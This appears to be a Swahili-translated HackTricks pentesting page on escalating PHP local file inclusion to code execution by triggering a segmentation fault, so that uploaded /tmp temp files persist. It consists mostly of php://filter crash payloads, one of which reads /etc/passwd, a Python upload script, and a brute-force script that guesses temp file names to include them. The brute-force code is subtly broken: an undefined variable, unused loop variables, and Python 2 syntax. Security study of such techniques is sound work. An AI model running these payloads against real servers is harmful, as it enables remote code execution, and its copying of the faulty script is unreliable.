hacktricks/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
2024-02-11 02:13:58 +00:00

4.4 KiB

LFI2RCE kupitia Kosa la Segmentation

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kulingana na maandishi https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ (sehemu ya pili) na https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view, mizigo ifuatayo ilisababisha kosa la segmentation katika PHP:

// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");

// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

Unapaswa kujua kwamba ikiwa unatuma ombi la POST lenye faili, PHP itaunda faili ya muda katika /tmp/php<kitu> na maudhui ya faili hiyo. Faili hii ita futwa moja kwa moja mara ombi litakapoprocess.

Ikiwa unapata LFI na unafanikiwa kuzindua kosa la kugawanyika katika PHP, faili ya muda haitafutwa kamwe. Kwa hivyo, unaweza kuitafuta kwa kutumia udhaifu wa LFI hadi uipate na kutekeleza nambari yoyote.

Unaweza kutumia picha ya docker https://hub.docker.com/r/easyengine/php7.0 kwa ajili ya majaribio.

# upload file with segmentation fault
import requests
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php','rb')}
response = requests.post(url, files=files)


# Search for the file (improve this with threads)
import requests
import string
import threading

charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)


def bruteforce(charset):
for i in charset:
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
filename = prefix + i + j + k
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
print url
response = requests.get(url)
if 'spyd3r' in response.content:
print "[+] Include success!"
return True


def main():
bruteforce(charset)

if __name__ == "__main__":
main()
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: